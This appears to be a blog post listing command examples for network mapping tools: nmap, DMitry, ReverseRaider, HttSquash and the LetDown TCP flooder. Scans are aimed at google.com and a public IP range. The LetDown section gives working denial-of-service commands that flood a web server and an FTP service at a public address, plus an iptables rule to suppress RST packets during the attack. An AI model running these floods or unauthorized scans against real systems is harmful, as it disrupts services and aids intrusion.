Network Mapping

Service Fingerprinting

nmap
Version Detection
#nmap -A -T4 -F 192.168.10.10

Complex Version Detection
#nmap -A -T4 192.168.10.10

DMitry - Deepmagic Information Gathering Tool

dmitry -w example-host.com
This will perform a named whois (INIC-WHOIS) lookup on the target host, displaying results to the standard output (STDOUT).

dmitry -winsepo sometextfile.txt example-host.com
This will perform all the basic functions on the target host and store all the output into "sometextfile.txt".

dmitry -winsepo example-host.com
This will perform all the basic functions on the target host and store all the output into "example-host.com.txt".

dmitry -winsepfbo 127.0.0.1
This will perform all the basic functions on the target host and store all the output into "127.0.0.1.txt". This will also display banners and show filtered ports.

LetDown
LetDown is a TCP Flooder. It has an (experimental) userland TCP/IP stack, fragmentation of packets and variable tcp window. From version 0.7 it supports multistage payloads for complex protocols such as FTP, SMTP, etc...

The basic idea is to first firewall your source address to prevent your own OS from interfering with your attack. Next you create hundreds or thousands of connections to the TCP port you are targeting

Let's see some simple uses of the tool...

Remember: the kernel will reset the connections if you don't set your firewall properly. For iptables you can use:

# iptables -A OUTPUT -p tcp --tcp-flags ALL RST -j DROP

Examples:

A generic 3-way handshake flooding against a service (in this case FTP):
# letdown -d 208.11.11.11 -s 192.168.1.9 -p 21

Attack against a webserver using payload and firewall options:
# letdown -d 208.11.11.11 -s 192.168.1.9 -p 80 -f iptables -P payloads/http.txt

Attack that use only 3 source ports (120-123) and with the time option:
# letdown -d 208.11.11.11 -s 192.168.1.9 -p 80 -x 120 -y 123 -t 10000

For advance tutorial visit complemento howto

ReverseRaider

ReverseRaider is a domain scanner that uses brute force wordlist scanning for finding a target subdomain or reverse resolution of an ip range. It supports permutation on wordlist, IPv6 and also some DNS options.

Reverse scanning of an ip range
reverseraider -r 66.249.93.100-120

Wordlist scanning of a domain
reverseraider -d google.com -w wordlists/fast.list


HttSquash
Httsquash is an http server scanner, banner grabber and data retriever. It can be used for scanning large ranges of ip for finding devices or http servers. It supports IPv6, personalized requests and a basic fingerprint of remote servers.
httsquash -r 89.97.126.0-10 -T head





Subscribe to: Posts (Atom)